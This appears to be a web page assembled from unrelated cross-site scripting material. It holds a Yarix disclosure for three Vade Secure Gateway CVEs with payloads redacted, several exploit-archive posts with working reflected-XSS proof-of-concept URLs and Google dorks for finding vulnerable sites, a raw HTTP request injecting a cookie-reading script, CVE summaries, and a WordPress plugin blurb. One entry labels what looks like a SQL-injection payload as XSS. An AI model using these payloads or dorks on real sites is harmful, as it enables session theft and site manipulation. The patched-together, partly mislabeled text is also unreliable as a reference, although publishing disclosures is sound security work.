Cross Site Scripting vulnerability found in Vade Secure Gateway allows a remote attacker to execute arbitrary code via a crafted payload to the X-Rewrite-URL parameter.

*   Home
*   Vade Secure Gateway Multiple XSS (CVE-2023-29712, CVE-2023-29713, CVE-2023-29714)

Back to Posts

**Vade Secure Gateway Multiple XSS (CVE-2023-29712, CVE-2023-29713, CVE-2023-29714)**

Reading Time: 4 minutes

**Vade Secure Gateway**

During a penetration test activity, several reflected cross-site scripting (XSS) vulnerabilities were found on an application developed by the French Company **Vade Secure**. The vulnerable application is Vade Secure Gateway which is an email box scanning and processing tool for spam removal that can be managed via a web page.

Once we identified the vulnerabilities and found that they had not been previously disclosed by someone else before, we made several attemps to establish contact with the Company to report the issue both via email and chat, but no contact could be established.

**Software Popularity**

Since we had no previous knowledge about this software, we wanted to verify its spread on the Internet.

We used fav-up to calculate the hash of the favicon, and we combined the result with Shodan, which allows to search for specific favicon hashes with the query

 http.favicon.hash:{HashFavicon}

The following picture highlights the number of detected products instances grouped by country.

**Version identification**

Even though there is no precise reference on the vendor site, it was possible to deduce the version via the release document found on the Vade Secure support page.

Given the changes made in version 3.0, we can infer that this is the target’s version.

**\*\*Since it was not possible to establish contact with the Company to identify a solution to these problems, we decided to hide the parameters and payloads in this article. However, we are always available in case Vade Secure wants to set up a collaboration with us, giving the opportunity to integrate the present article with information on future patches that solve the problems reported.\*\***

**Technical Recap**

Three vulnerabilities were identified in this application, broken down as follows:

*   one **Reflected XSS** vulnerability (**CVE-2023-29713**) \[**High**\]
*   two **DOM-based XSS** vulnerabilities (**CVE-2023-29712, CVE-2023-29714**) \[**Medium**\]

These types of attacks allow an unauthorized user to inject Javascript or HTML code within the victim’s browser to steal information or induce to perform certain operations through social engineering techniques.

**Advisory – CVE-2023-29712**

DOM-based XSS in Vade Secure Gateway

Medium

Description

Cross Site Scripting vulnerability found in Vade Secure Gateway <= 3.0 allows a remote attacker to execute arbitrary code via a crafted payload to the \*\*\*\* parameter.

Remediations

See the section “recommendations”

Category

OWASP Top 10: A3 – Injection

CVSS v3.1

Base Score: 6.1  
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Affected product

Vade Secure Gateway <= v3.0

Account

Unauthenticated

Vulnerable resources

   **REDACTED**

Proof of Concept

See the picture below

**Advisory – CVE-2023-29713**

Reflected XSS in Vade Secure Gateway

High

Description

Cross Site Scripting vulnerability found in Vade Secure Gateway <= 3.0 allows a remote attacker to execute arbitrary code via a crafted payload to the GET request after the \*\*\*\* directory.

Remediations

See the section “recommendations”

Category

OWASP Top 10: A3 – Injection

CVSS v3.1

Base Score: 8.1  
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Affected product

Vade Secure Gateway <= v3.0

Account

Unauthenticated

Vulnerable resources

  **REDACTED**

Proof of Concept

See the picture below

**Advisory – CVE-2023-29714**

DOM-based XSS in Vade Secure Gateway

Medium

Description

Cross Site Scripting vulnerability found in Vade Secure Gateway <= 3.0 allows a remote attacker to execute arbitrary code via the \*\*\*\*, \*\*\*\*, and \*\*\*\* cookies parameter.

Remediations

See the section “recommendations”

Category

OWASP Top 10: A3 – Injection

CVSS v3.1

Base Score: 6.1  
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Affected product

Vade Secure Gateway <= v3.0

Account

Unauthenticated

Vulnerable resources

  **REDACTED**

Proof of Concept

See the picture below

**Recommendiations**

Since there is no known update to fix the following vulnerabilities, we recommend adopting a WAF and tuning it in order to mitigate the attacks listed above. Also, if a direct contact with the supplier is available, please advise them of these issues.

**Disclosure Timeline**

*   14/03/2022 → Identification of the vulnerabilities
*   27/07/2022 → First email contact with Vade Secure (no reply)
*   05/08/2022 → Second email contact with Vade Secure (no reply)
*   03/02/2023 → Contacted via site chat and sent Vulnerability Disclosure Policy (we received a reply and they said they had turned the issue over to the relevant department)
*   06/03/2023 → Sent emails with XSS vulnerability testimonials and Vulnerability Disclosure Policy (no reply)
*   08/03/2023 → Requested CVEs
*   08/03/2023 → Sent email to Vede Secure to inform that we have applied for CVEs assignment (no reply)
*   16/03/2023 → Sent email with proof of concept of the vulnerabilities to Vade Secure (no reply)
*   09/05/2023 → Assignment of CVEs by MITRE
*   23/05/2023 → Sent an email to request cooperation again to resolve the issues and to inform that the proof of concept will not be published (no reply)

**Resources & References**

*   Vade | AI-Powered, Collaborative Email Security
*   Vade Secure Gateway
*   Vade Secure Gateway Release Notes
*   CVE-2023-29712
*   CVE-2023-29713
*   CVE-2023-29714

**Author**

**Nico Trionfetti** is a member of the **Yarix’s Red Team**, graduated from UNICAM with a degree in IT. He is passionate on Penetration testing with a focus on the web and outside of the cybersecurity he is passionate on films and tv series and outdoor activities.

**Author**

**Ylabs**

Back to Posts

CVE-2023-29712: Vade Secure Gateway Multiple XSS (CVE-2023-29712, CVE-2023-29713, CVE-2023-29714)

Movierocket version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/32650/                                      ││  Vendor   : Bwiresoft                                                                  ││  Software : Movierocket 1.0                                                            ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /search_catalogGET parameter 'keywords' is vulnerable to RXSShttps://website/search_catalog?keywords=sz83n<script>alert(1)</script>k8jqbPath: /loginGET parameter 'red' is vulnerable to RXSShttps://website/login?red=bol85"><script>alert(1)</script>fdg21 [-] Done

Movierocket 1.0 Cross Site Scripting

Codemonkey Multi Vendor Digital Product Mart version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/39478/                                      ││  Vendor   : Bwiresoft                                                                  ││  Software : Codemonkey Multi Vendor Digital Product Mart 1.0                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchGET parameter 'keyword' is vulnerable to RXSShttps://website/search?keyword=ohv4i<script>alert(1)</script>f6pt8&category=allPath: /loginGET parameter 'red' is vulnerable to RXSShttps://website/login?red=vp6bx"><script>alert(1)</script>ik2tx[-] Done

Codemonkey Multi Vendor Digital Product Mart 1.0 Cross Site Scripting

Scriptio version 1.4 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/39492/ -  https://mybizcms.com/             ││  Vendor   : Emporium                                                                   ││  Software : Scriptio 1.4 (An online text scripts sharing and selling platform)         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJobd     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchGET parameter 'pg' is vulnerable to RXSShttps://website/search?q=&pg=ohv4i<script>alert(1)</script>f6pt8[-] Done

Scriptio 1.4 Cross Site Scripting

EasyAnswer version 1.0.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/40311/                                      ││  Vendor   : Promofile                                                                  ││  Software : EasyAnswer 1.0.1                                                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJobd     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /loginGET parameter 'redirect' is vulnerable to RXSShttps://website/login?redirect=afrsa"><script>alert(1)</script>htxuo[-] Done

EasyAnswer 1.0.1 Cross Site Scripting

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

**P2S CMS 0.1 Cross Site Scripting**

Posted Jun 9, 2023

Authored by indoushka

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 7bb6a5d8c0fb7077e0992b71833738c252f38ebb48abe398cde8f60022fba24c

Download | Favorite | View

**P2S CMS 0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : P2s-cms v0.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://www.primestart.net/                                                                                        || # Dork      : index.php?page=busca&palavra=                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  Use Payload : <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/avamcombr/index.php?page=busca&palavra=%3Cscript%3Ealert(/indoushka/);%3C/script%3E        Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,354)
*   Arbitrary (16,067)
*   BBS (2,859)
*   Bypass (1,694)
*   CGI (1,024)
*   Code Execution (7,157)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,317)
*   DoS (23,189)
*   Encryption (2,363)
*   Exploit (51,175)
*   File Inclusion (4,195)
*   File Upload (955)
*   Firewall (821)
*   Info Disclosure (2,720)
*   Intrusion Detection (884)
*   Java (3,002)
*   JavaScript (841)
*   Kernel (6,577)
*   Local (14,393)
*   Magazine (586)
*   Overflow (12,614)
*   Perl (1,423)
*   PHP (5,124)
*   Proof of Concept (2,302)
*   Protocol (3,567)
*   Python (1,509)
*   Remote (30,515)
*   Root (3,556)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,854)
*   Shell (3,163)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,234)
*   TCP (2,394)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,597)
*   Web (9,571)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,693)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,979)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,758)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (344)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,866)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,370)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,652)
*   UNIX (9,246)
*   UnixWare (186)
*   Windows (6,557)
*   Other

P2S CMS 0.1 Cross Site Scripting

PHP Live version 3.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : PHP Live 3.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0.3(32-bit)                                             | | # Vendor    : https://www.phplivesupport.com                                                                                     |  | # Dork      : "powered by PHP Live! "                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /message_box.php?action=submit&deptid=1 AND 3*2*1%3d6 AND 556%3d556&email=sample%40email.tst&l=e-assis&message=20&name=xtmxbmyr&requestid=&send=Enviar Email&subject=1&x=1[+] Test : http://127.0.0.1/cestaseflorescriscombr/chat/message_box.php?action=submit&deptid=1%20AND%203*2*1%3d6%20AND%20556%3d556&email=sample%40email.tst&l=e-assis&message=20&name=xtmxbmyr&requestid=&send=Enviar%20Email&subject=1&x=1 .Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

PHP Live 3.1 Cross Site Scripting

A vulnerability was found in SourceCodester Sales Tracker Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /classes/Users.php?f=save. The manipulation of the argument firstname/middlename/lastname/username leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-231164.

CVE-2023-3184

A vulnerability was found in SourceCodester Performance Indicator System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/addproduct.php. The manipulation of the argument prodname leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231163.

    POST /opils/admin/addproduct.php HTTP/1.1
    Host: localhost
    Content-Length: 708
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiJHYays1OlY0KkQr
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/opils/admin/product.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: __atuvc=2%7C20; PHPSESSID=k9h36uumt85ueqglvvv3imaap0
    Connection: close
    
    ------WebKitFormBoundaryiJHYays1OlY0KkQr
    Content-Disposition: form-data; name="prodname"
    
    <script>alert(document.cookie)</script>
    ------WebKitFormBoundaryiJHYays1OlY0KkQr
    Content-Disposition: form-data; name="prodcategory"
    
    1
    ------WebKitFormBoundaryiJHYays1OlY0KkQr
    Content-Disposition: form-data; name="proprice"
    
    1
    ------WebKitFormBoundaryiJHYays1OlY0KkQr
    Content-Disposition: form-data; name="prodpromo"
    
    0
    ------WebKitFormBoundaryiJHYays1OlY0KkQr
    Content-Disposition: form-data; name="pqty"
    
    2
    ------WebKitFormBoundaryiJHYays1OlY0KkQr
    Content-Disposition: form-data; name="image"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryiJHYays1OlY0KkQr--

CVE-2023-3183: bugReport/XSS.md at main · wenwochunfeng/bugReport

The Locatoraid Store Locator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in versions up to, and including, 3.9.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

44Tags: google maps, store locator, business locations, dealer locator, geocoding, geolocation, dealer locater, zipcode locator, store locater, gmaps, google map plugin, mapping, mapper, shop locator, shop finder, shortcode, location finder, places, widget, stores, plugin, maps, coordinates, latitude, longitude, posts, geo, jquery, shops, page, zip code, zip code search, store finder, address map, address location map, map maker, map creator, mapping software, map tools, mapping tools, locator maps, map of addresses, map multiple locations, wordpress locator, store locator map

Tag

#xss